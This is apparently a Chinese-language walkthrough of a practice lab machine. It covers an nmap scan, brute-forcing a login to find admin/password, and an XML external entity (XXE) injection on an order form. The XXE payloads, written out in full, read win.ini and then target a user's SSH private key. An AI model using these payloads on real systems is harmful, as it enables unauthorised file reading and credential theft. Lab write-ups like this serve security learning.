1.主机发现

nmap -v -sV  -sC 10.129.95.192

图片

开放了22,80端口和443端口

2.爆破

直接访问80端口,是一个登录页面

bp爆破

图片

可见admin/password是账号和密码

图片

成功登录

3.XXE

在order,contact界面用户可以传入数据,但是contact界面的submit是无效的

抓个包看看

图片

发现提交的数据是xml的格式,所以可能存在XXE的漏洞

构造如下数据

<?xml version = "1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
# 把c:/windows/win.ini的内容放到test里面
<order>
<quantity>
1
</quantity>
<item>
&test;
# 读取test
</item>
<address>sssssss</address></order>

返回了win.ini的内容
图片

我们尝试在⽹⻚的 HTML 代码中找到⼀些重要的东西

图片

找到了一个人名字,这可能是靶机的一个用户,修改一下

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>